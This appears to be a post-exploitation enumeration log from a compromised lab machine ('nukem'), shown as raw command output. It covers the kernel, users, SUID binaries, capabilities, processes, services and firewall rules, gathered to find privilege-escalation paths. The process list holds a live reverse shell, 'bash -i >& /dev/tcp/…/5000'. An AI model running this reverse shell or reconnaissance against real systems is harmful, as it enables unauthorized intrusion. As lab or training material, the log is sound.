System/Kernel
[http@nukem simple-file-list]$ uname -a ; cat /etc/*release
Linux nukem 5.8.9-arch2-1 #1 SMP PREEMPT Sun, 13 Sep 2020 23:44:55 +0000 x86_64 GNU/Linux
Arch Linux release
LSB_VERSION=1.4
DISTRIB_ID=Arch
DISTRIB_RELEASE=rolling
DISTRIB_DESCRIPTION="Arch Linux"
NAME="Arch Linux"
PRETTY_NAME="Arch Linux"
ID=arch
BUILD_ID=rolling
ANSI_COLOR="38;2;23;147;209"
HOME_URL="https://www.archlinux.org/"
DOCUMENTATION_URL="https://wiki.archlinux.org/"
SUPPORT_URL="https://bbs.archlinux.org/"
BUG_REPORT_URL="https://bugs.archlinux.org/"
LOGO=archlinux5.8.9-arch2-1x86_64Arch Linux 1.4
Networks
[http@nukem simple-file-list]$ ip route ; arp -a
default via 192.168.113.254 dev ens192 proto static
192.168.113.0/24 dev ens192 proto kernel scope link src 192.168.113.105
? (192.168.120.55) at <incomplete> on ens192
_gateway (192.168.113.254) at 00:50:56:9e:59:95 [ether] on ens192[http@nukem simple-file-list]$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:36445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:13000 0.0.0.0:* LISTEN 555/nginx: worker p
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 141 192.168.113.105:49874 192.168.45.192:5000 ESTABLISHED 960/bash tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN -
Users & Groups
[http@nukem simple-file-list]$ cat /etc/passwd ; ll /home
root:x:0:0::/root:/bin/bash
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
ftp:x:14:11::/srv/ftp:/usr/bin/nologin
http:x:33:33::/srv/http:/usr/bin/nologin
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
dbus:x:81:81:System Message Bus:/:/usr/bin/nologin
systemd-journal-remote:x:982:982:systemd Journal Remote:/:/usr/bin/nologin
systemd-network:x:981:981:systemd Network Management:/:/usr/bin/nologin
systemd-resolve:x:980:980:systemd Resolver:/:/usr/bin/nologin
systemd-timesync:x:979:979:systemd Time Synchronization:/:/usr/bin/nologin
systemd-coredump:x:978:978:systemd Core Dumper:/:/usr/bin/nologin
uuidd:x:68:68::/:/usr/bin/nologin
mysql:x:977:977:MariaDB:/var/lib/mysql:/usr/bin/nologin
commander:x:1000:1000::/home/commander:/bin/bash
avahi:x:976:976:Avahi mDNS/DNS-SD daemon:/:/usr/bin/nologin
colord:x:975:975:Color management daemon:/var/lib/colord:/usr/bin/nologin
lightdm:x:974:974:Light Display Manager:/var/lib/lightdm:/usr/bin/nologin
polkitd:x:102:102:PolicyKit daemon:/:/usr/bin/nologin
usbmux:x:140:140:usbmux user:/:/usr/bin/nologin
git:x:973:973:git daemon user:/:/usr/bin/git-shell
total 12K
4.0K drwxr-xr-x 17 root root 4.0K Mar 10 16:36 ..
4.0K drwxr-xr-x 10 commander commander 4.0K Jan 30 07:49 commander
4.0K drwxr-xr-x 3 root root 4.0K Sep 18 2020 .commander
[http@nukem simple-file-list]$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin),3(sys),2(daemon)
uid=2(daemon) gid=2(daemon) groups=2(daemon),999(adm),1(bin)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=14(ftp) gid=11(ftp) groups=11(ftp)
uid=33(http) gid=33(http) groups=33(http)
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=982(systemd-journal-remote) gid=982(systemd-journal-remote) groups=982(systemd-journal-remote)
uid=981(systemd-network) gid=981(systemd-network) groups=981(systemd-network)
uid=980(systemd-resolve) gid=980(systemd-resolve) groups=980(systemd-resolve)
uid=979(systemd-timesync) gid=979(systemd-timesync) groups=979(systemd-timesync)
uid=978(systemd-coredump) gid=978(systemd-coredump) groups=978(systemd-coredump)
uid=68(uuidd) gid=68(uuidd) groups=68(uuidd)
uid=977(mysql) gid=977(mysql) groups=977(mysql)
uid=1000(commander) gid=1000(commander) groups=1000(commander)
uid=976(avahi) gid=976(avahi) groups=976(avahi)
uid=975(colord) gid=975(colord) groups=975(colord)
uid=974(lightdm) gid=974(lightdm) groups=974(lightdm)
uid=102(polkitd) gid=102(polkitd) groups=102(polkitd),26(proc)
uid=140(usbmux) gid=140(usbmux) groups=140(usbmux)
uid=973(git) gid=973(git) groups=973(git)uid=33(http) gid=33(http) groups=33(http)uid=1000(commander) gid=1000(commander) groups=1000(commander)
SUIDs
[http@nukem simple-file-list]$ find / -perm -04000 -ls -type f 2>/dev/null
413356 60 -rwsr-x--- 1 root dbus 59272 Jul 2 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
423975 464 -rws--x--x 1 root root 473168 Aug 30 2020 /usr/lib/ssh/ssh-keysign
428917 16 -rwsr-xr-x 1 root root 14496 Sep 2 2020 /usr/lib/Xorg.wrap
431316 20 -rwsr-xr-x 1 root root 18184 Aug 3 2020 /usr/lib/polkit-1/polkit-agent-helper-1
419298 36 -rwsr-xr-x 1 root root 34648 May 16 2020 /usr/bin/fusermount
410360 68 -rwsr-xr-x 1 root root 67552 Sep 10 2020 /usr/bin/su
409559 56 -rwsr-xr-x 1 root root 55048 May 23 2020 /usr/bin/ksu
410175 80 -rwsr-xr-x 1 root root 79912 Sep 7 2020 /usr/bin/gpasswd
431272 28 -rwsr-xr-x 1 root root 26376 Aug 3 2020 /usr/bin/pkexec
410277 32 -rwsr-xr-x 1 root root 30688 Sep 10 2020 /usr/bin/chsh
441051 160 -rwsr-xr-x 1 root root 161880 Sep 24 2020 /usr/bin/sudo
410173 28 -rwsr-xr-x 1 root root 26768 Sep 7 2020 /usr/bin/expiry
410334 52 -rwsr-xr-x 1 root root 51168 Sep 10 2020 /usr/bin/mount
410188 64 -rwsr-xr-x 1 root root 63640 Sep 7 2020 /usr/bin/passwd
410273 36 -rwsr-xr-x 1 root root 34784 Sep 10 2020 /usr/bin/chfn
410368 36 -rwsr-xr-x 1 root root 34784 Sep 10 2020 /usr/bin/umount
410170 72 -rwsr-xr-x 1 root root 71744 Sep 7 2020 /usr/bin/chage
435165 2548 -rwsr-xr-x 1 root root 2606856 Jul 7 2020 /usr/bin/dosbox
410337 20 -rwsr-xr-x 1 root root 18400 Sep 10 2020 /usr/bin/newgrp
439617 44 -rwsr-sr-x 1 root root 43680 Jan 4 2020 /usr/bin/mount.cifs
425948 20 -rwsr-xr-x 1 root root 18256 Aug 21 2020 /usr/bin/suexec
422943 16 -rwsr-sr-t 1 root root 14160 Aug 20 2020 /usr/bin/vmware-user-suid-wrapper
410192 44 -rwsr-xr-x 1 root root 44368 Sep 7 2020 /usr/bin/sg
409948 40 -rwsr-sr-x 1 root root 38664 Aug 12 2020 /usr/bin/unix_chkpwd431316 20 -rwsr-xr-x 1 root root 18184 Aug 3 2020 /usr/lib/polkit-1/polkit-agent-helper-1431272 28 -rwsr-xr-x 1 root root 26376 Aug 3 2020 /usr/bin/pkexec435165 2548 -rwsr-xr-x 1 root root 2606856 Jul 7 2020 /usr/bin/dosbox410192 44 -rwsr-xr-x 1 root root 44368 Sep 7 2020 /usr/bin/sg
SGIDs
[http@nukem simple-file-list]$ find / -perm -02000 -ls -type f 2>/dev/null
131665 8 drwxr-sr-x 4 root systemd-journal 4096 Sep 18 2020 /var/log/journal
131852 8 drwxr-sr-x 2 root systemd-journal 4096 Mar 10 16:25 /var/log/journal/54ecd58cf3cf489fa4da8e9f52e4440e
131670 8 drwxr-sr-x 2 root systemd-journal-remote 4096 Sep 18 2020 /var/log/journal/remote
410377 36 -rwxr-sr-x 1 root tty 34784 Sep 10 2020 /usr/bin/wall
439617 44 -rwsr-sr-x 1 root root 43680 Jan 4 2020 /usr/bin/mount.cifs
422943 16 -rwsr-sr-t 1 root root 14160 Aug 20 2020 /usr/bin/vmware-user-suid-wrapper
410381 24 -rwxr-sr-x 1 root tty 22496 Sep 10 2020 /usr/bin/write
409948 40 -rwsr-sr-x 1 root root 38664 Aug 12 2020 /usr/bin/unix_chkpwd
12816 0 drwxr-sr-x 2 root systemd-journal 40 Jan 30 07:49 /run/log/journalCapabilities
[http@nukem simple-file-list]$ getcap -r / 2>/dev/null
/usr/bin/rlogin cap_net_bind_service=ep
/usr/bin/rsh cap_net_bind_service=ep
/usr/bin/newgidmap cap_setgid=ep
/usr/bin/rcp cap_net_bind_service=ep
/usr/bin/newuidmap cap_setuid=epProcesses
[http@nukem simple-file-list]$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.5 28288 11588 ? Ss 15:53 0:00 /sbin/init
root 214 0.0 0.9 71840 19896 ? Ss 15:53 0:00 /usr/lib/systemd/systemd-journald
root 223 0.0 0.4 33708 9860 ? Ss 15:53 0:00 /usr/lib/systemd/systemd-udevd
dbus 252 0.0 0.2 7572 4472 ? Ss 15:53 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 254 0.0 0.4 19040 9188 ? Ss 15:53 0:00 /usr/lib/systemd/systemd-logind
root 255 0.0 0.3 233816 7516 ? Ssl 15:53 0:02 /usr/bin/vmtoolsd
root 300 0.0 1.1 74076 22552 ? Ss 15:53 0:00 /usr/bin/httpd -k start -DFOREGROUND
root 303 0.0 0.2 8784 5596 ? Ss 15:53 0:00 sshd: /usr/bin/sshd -D [listener] 0 of 10-100 startups
root 308 0.0 0.3 231300 6840 ? Ssl 15:53 0:00 /usr/bin/lightdm
mysql 340 0.0 4.2 625248 86888 ? Ssl 15:53 0:01 /usr/bin/mariadbd
root 370 0.0 2.8 183940 56908 tty7 Ss+ 15:53 0:00 /usr/lib/Xorg :0 -seat seat0 -auth /run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch
root 378 0.0 0.1 5888 3484 ? Ss 15:53 0:00 /usr/bin/vncsession commander :1
command+ 386 0.0 0.5 20472 10464 ? Ss 15:53 0:00 /usr/lib/systemd/systemd --user
command+ 391 0.0 0.1 31924 2860 ? S 15:53 0:00 (sd-pam)
command+ 398 0.0 0.0 3876 1144 ? S 15:53 0:00 xinit /etc/lightdm/Xsession startxfce4 -- /usr/bin/Xvnc :1 -alwaysshared -geometry 1024x728 -localhost -auth /home/commander/.Xauthority -desktop nukem:1 (commander) -fp /usr/share/fonts/75dpi,/usr/share/fonts/100dpi -pn -rfbauth /home/commander/.vnc/passwd -rfbport 5901 -rfbwait 30000
command+ 410 0.0 3.6 199496 74392 ? S 15:53 0:00 /usr/bin/Xvnc :1 -alwaysshared -geometry 1024x728 -localhost -auth /home/commander/.Xauthority -desktop nukem:1 (commander) -fp /usr/share/fonts/75dpi,/usr/share/fonts/100dpi -pn -rfbauth /home/commander/.vnc/passwd -rfbport 5901 -rfbwait 30000
command+ 415 0.0 2.9 405184 59796 ? Sl 15:53 0:00 xfce4-session
command+ 419 0.0 0.2 7256 4188 ? Ss 15:53 0:00 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 421 0.0 0.3 160256 7452 ? Sl 15:53 0:00 lightdm --session-child 18 21
lightdm 425 0.0 0.5 20276 10288 ? Ss 15:53 0:00 /usr/lib/systemd/systemd --user
lightdm 426 0.0 0.1 31924 2920 ? S 15:53 0:00 (sd-pam)
lightdm 438 0.0 3.5 415536 72144 ? Ssl 15:53 0:00 /usr/bin/lightdm-gtk-greeter
lightdm 440 0.0 0.1 6960 3724 ? Ss 15:53 0:00 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
lightdm 441 0.0 0.2 304152 6056 ? Ssl 15:53 0:00 /usr/lib/at-spi-bus-launcher
lightdm 447 0.0 0.1 6960 3716 ? S 15:53 0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 3
command+ 448 0.0 0.3 304152 6540 ? Ssl 15:53 0:00 /usr/lib/at-spi-bus-launcher
command+ 454 0.0 0.1 7092 4060 ? S 15:53 0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 3
command+ 461 0.0 0.2 229176 5856 ? Sl 15:53 0:00 /usr/lib/xfce4/xfconf/xfconfd
command+ 468 0.0 0.3 160720 7256 ? Sl 15:53 0:00 /usr/lib/at-spi2-registryd --use-gnome-session
polkitd 469 0.0 1.0 2569800 20556 ? Ssl 15:53 0:00 /usr/lib/polkit-1/polkitd --no-debug
command+ 481 0.0 0.0 5892 448 ? Ss 15:53 0:00 /usr/bin/ssh-agent -s
command+ 484 0.0 0.0 151796 1416 ? SLs 15:53 0:00 /usr/bin/gpg-agent --supervised
command+ 486 0.0 4.1 352524 84048 ? Sl 15:53 0:00 xfwm4
root 488 0.0 0.2 12868 6036 ? S 15:53 0:00 lightdm --session-child 14 21
lightdm 491 0.0 0.2 160580 5844 ? Sl 15:53 0:00 /usr/lib/at-spi2-registryd --use-gnome-session
command+ 497 0.0 0.9 218104 20028 ? Ssl 15:53 0:00 xfsettingsd
command+ 498 0.0 1.4 261540 30052 ? Sl 15:53 0:00 xfce4-panel
command+ 504 0.0 1.0 331424 21716 ? Sl 15:53 0:00 Thunar --daemon
command+ 509 0.0 1.7 265880 34580 ? Sl 15:53 0:00 xfdesktop
command+ 510 0.0 1.0 182632 21848 ? Sl 15:53 0:00 /usr/lib/xfce4/panel/wrapper-2.0 /usr/lib/xfce4/panel/plugins/libsystray.so 6 12582920 systray Notification Area Area where notification icons appear
command+ 511 0.0 1.3 185780 27700 ? Sl 15:53 0:00 /usr/lib/xfce4/panel/wrapper-2.0 /usr/lib/xfce4/panel/plugins/libxfce4powermanager.so 9 12582921 power-manager-plugin Power Manager Plugin Display the battery levels of your devices and control the brightness of your display
command+ 512 0.0 1.2 184488 25260 ? Sl 15:53 0:00 /usr/lib/xfce4/panel/wrapper-2.0 /usr/lib/xfce4/panel/plugins/libactions.so 14 12582922 actions Action Buttons Log out, lock or other system actions
root 522 0.0 0.4 312332 8648 ? Ssl 15:53 0:00 /usr/lib/upowerd
command+ 526 0.0 1.0 39420 22000 ? S 15:53 0:02 /usr/bin/vmtoolsd -n vmusr
command+ 532 0.0 1.0 182012 20436 ? Sl 15:53 0:00 /usr/lib/polkit-gnome/polkit-gnome-authentication-agent-1
command+ 536 0.0 0.9 182972 18716 ? Ssl 15:53 0:00 xfce4-power-manager
root 552 0.0 1.6 119664 34068 ? Ss 15:55 0:00 /usr/bin/python /home/commander/python_rest_flask/server.py
root 553 0.0 1.3 85552 27336 ? Ss 15:55 0:00 /usr/bin/smbd --foreground --no-process-group -p36445 ## Type: string ## Default: ## ServiceRestart: nmb NMBDOPTIONS= ## Type: string ## Default: ## ServiceRestart: winbind WINBINDOPTIONS=
root 554 0.0 0.0 9132 1096 ? Ss 15:55 0:00 nginx: master process /usr/bin/nginx -g pid /run/nginx.pid; error_log stderr;
http 555 0.3 0.2 9916 4384 ? S 15:55 0:21 nginx: worker process
root 557 0.0 0.4 83328 9496 ? S 15:55 0:00 /usr/bin/smbd --foreground --no-process-group -p36445 ## Type: string ## Default: ## ServiceRestart: nmb NMBDOPTIONS= ## Type: string ## Default: ## ServiceRestart: winbind WINBINDOPTIONS=
root 558 0.0 0.2 83320 4716 ? S 15:55 0:00 /usr/bin/smbd --foreground --no-process-group -p36445 ## Type: string ## Default: ## ServiceRestart: nmb NMBDOPTIONS= ## Type: string ## Default: ## ServiceRestart: winbind WINBINDOPTIONS=
root 559 0.0 0.4 85552 9936 ? S 15:55 0:00 /usr/bin/smbd --foreground --no-process-group -p36445 ## Type: string ## Default: ## ServiceRestart: nmb NMBDOPTIONS= ## Type: string ## Default: ## ServiceRestart: winbind WINBINDOPTIONS=
systemd+ 667 0.0 0.4 19388 9016 ? Ss 16:25 0:00 /usr/lib/systemd/systemd-networkd
http 911 0.0 0.6 74584 13412 ? S 17:00 0:00 /usr/bin/httpd -k start -DFOREGROUND
http 912 0.0 0.6 74452 13300 ? S 17:00 0:00 /usr/bin/httpd -k start -DFOREGROUND
http 913 0.0 0.6 74452 13300 ? S 17:00 0:00 /usr/bin/httpd -k start -DFOREGROUND
http 914 0.0 0.6 74584 13432 ? S 17:00 0:00 /usr/bin/httpd -k start -DFOREGROUND
http 915 0.0 1.4 87100 29212 ? S 17:00 0:00 /usr/bin/httpd -k start -DFOREGROUND
http 916 0.0 0.6 74452 13268 ? S 17:00 0:00 /usr/bin/httpd -k start -DFOREGROUND
http 917 0.0 0.6 74452 13304 ? S 17:00 0:00 /usr/bin/httpd -k start -DFOREGROUND
http 918 0.0 0.8 74812 18128 ? S 17:00 0:00 /usr/bin/httpd -k start -DFOREGROUND
http 938 0.0 1.3 87080 28364 ? S 17:04 0:00 /usr/bin/httpd -k start -DFOREGROUND
http 959 0.0 0.1 4164 3036 ? S 17:08 0:00 sh -c bash -i >& /dev/tcp/192.168.45.192/5000 0>&1
http 960 0.0 0.1 4428 3708 ? S 17:08 0:00 bash -i
http 1065 0.0 0.1 6800 3192 ? R 17:38 0:00 ps -auxwwwroot 300 0.0 1.1 74076 22552 ? Ss 15:53 0:00 /usr/bin/httpd -k start -DFOREGROUNDroot 308 0.0 0.3 231300 6840 ? Ssl 15:53 0:00 /usr/bin/lightdmmysql 340 0.0 4.2 625248 86888 ? Ssl 15:53 0:01 /usr/bin/mariadbdroot 370 0.0 2.8 183940 56908 tty7 Ss+ 15:53 0:00 /usr/lib/Xorg :0 -seat seat0 -auth /run/lightdm/root/:0 -nolisten tcp vt7 -novtswitchroot 378 0.0 0.1 5888 3484 ? Ss 15:53 0:00 /usr/bin/vncsession commander :1command+ 398 0.0 0.0 3876 1144 ? S 15:53 0:00 xinit /etc/lightdm/Xsession startxfce4 -- /usr/bin/Xvnc :1 -alwaysshared -geometry 1024x728 -localhost -auth /home/commander/.Xauthority -desktop nukem:1 (commander) -fp /usr/share/fonts/75dpi,/usr/share/fonts/100dpi -pn -rfbauth /home/commander/.vnc/passwd -rfbport 5901 -rfbwait 30000command+ 410 0.0 3.6 199496 74392 ? S 15:53 0:00 /usr/bin/Xvnc :1 -alwaysshared -geometry 1024x728 -localhost -auth /home/commander/.Xauthority -desktop nukem:1 (commander) -fp /usr/share/fonts/75dpi,/usr/share/fonts/100dpi -pn -rfbauth /home/commander/.vnc/passwd -rfbport 5901 -rfbwait 30000command+ 415 0.0 2.9 405184 59796 ? Sl 15:53 0:00 xfce4-sessionroot 421 0.0 0.3 160256 7452 ? Sl 15:53 0:00 lightdm --session-child 18 21command+ 461 0.0 0.2 229176 5856 ? Sl 15:53 0:00 /usr/lib/xfce4/xfconf/xfconfdpolkitd 469 0.0 1.0 2569800 20556 ? Ssl 15:53 0:00 /usr/lib/polkit-1/polkitd --no-debugcommand+ 486 0.0 4.1 352524 84048 ? Sl 15:53 0:00 xfwm4root 488 0.0 0.2 12868 6036 ? S 15:53 0:00 lightdm --session-child 14 21command+ 497 0.0 0.9 218104 20028 ? Ssl 15:53 0:00 xfsettingsdcommand+ 498 0.0 1.4 261540 30052 ? Sl 15:53 0:00 xfce4-panelcommand+ 504 0.0 1.0 331424 21716 ? Sl 15:53 0:00 Thunar --daemoncommand+ 509 0.0 1.7 265880 34580 ? Sl 15:53 0:00 xfdesktopcommand+ 532 0.0 1.0 182012 20436 ? Sl 15:53 0:00 /usr/lib/polkit-gnome/polkit-gnome-authentication-agent-1root 552 0.0 1.6 119664 34068 ? Ss 15:55 0:00 /usr/bin/python /home/commander/python_rest_flask/server.pyroot 553 0.0 1.3 85552 27336 ? Ss 15:55 0:00 /usr/bin/smbd --foreground --no-process-group -p36445 ## Type: string ## Default: ## ServiceRestart: nmb NMBDOPTIONS= ## Type: string ## Default: ## ServiceRestart: winbind WINBINDOPTIONS=
Cron & Systemd
[http@nukem simple-file-list]$ crontab -l ; cat /etc/crontab ; systemctl list-timers
bash: crontab: command not found
cat: /etc/crontab: No such file or directory
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2025-03-11 00:00:00 UTC 6h left Mon 2025-03-10 16:25:48 UTC 1h 17min ago man-db.timer man-db.service
Tue 2025-03-11 00:00:00 UTC 6h left Mon 2025-03-10 16:25:48 UTC 1h 17min ago shadow.timer shadow.service
Tue 2025-03-11 16:08:33 UTC 22h left Thu 2025-01-30 08:04:03 UTC 1 months 8 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
3 timers listed.
Pass --all to see loaded but inactive timers, too.Services
[http@nukem simple-file-list]$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
session-1.scope loaded active running Session 1 of user commander
session-c1.scope loaded active running Session c1 of user lightdm
dbus.service loaded active running D-Bus System Message Bus
httpd.service loaded active running Apache Web Server
lightdm.service loaded active running Light Display Manager
mariadb.service loaded active running MariaDB 10.5.5 database server
nginx.service loaded active running A high performance web server and a reverse proxy server
polkit.service loaded active running Authorization Manager
pythonflask.service loaded active running FlaskApp
smb.service loaded active running Samba SMB Daemon
sshd.service loaded active running OpenSSH Daemon
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running User Login Management
systemd-networkd.service loaded active running Network Service
systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files
upower.service loaded active running Daemon for power management
user@1000.service loaded active running User Manager for UID 1000
user@974.service loaded active running User Manager for UID 974
vmtoolsd.service loaded active running Open Virtual Machine Tools (VMware Tools)
vncserver@:1.service loaded active running Remote desktop service (VNC)
dbus.socket loaded active running D-Bus System Message Bus Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-networkd.socket loaded active running Network Service Netlink Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
29 loaded units listed.httpd.servicelightdm.servicemariadb.servicenginx.servicepythonflask.service
Firewall
[http@nukem simple-file-list]$ cat /etc/iptables/*.rules
# Empty iptables rule file
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT
# Empty iptables rule file
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT
# Generated by iptables-save v1.8.5 on Mon Sep 28 14:21:13 2020
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate NEW,RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 3306 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 5000 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 13000 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 36445 -j ACCEPT
-A INPUT -p udp -m udp --dport 53 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT
-A INPUT -j DROP
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 80 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 3306 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 3306 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 5000 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 5000 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 13000 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 13000 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 36445 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 36445 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p udp -m udp --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A OUTPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT
-A OUTPUT -j DROP
COMMIT
# Completed on Mon Sep 28 14:21:13 2020
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p icmp -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -j REJECT --reject-with tcp-reset
-A INPUT -p udp -j REJECT --reject-with icmp-port-unreachable
-A INPUT -j REJECT --reject-with icmp-proto-unreachable
COMMITFirewall is heavily enforced
Sudo Version
[http@nukem simple-file-list]$ sudo --version
Sudo version 1.9.3p1
Sudoers policy plugin version 1.9.3p1
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.3p1
Sudoers audit plugin version 1.9.3p1Sudo version 1.9.3p1
Glibc Version
[http@nukem simple-file-list]$ ldd --version
ldd (GNU libc) 2.32
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (GNU libc) 2.32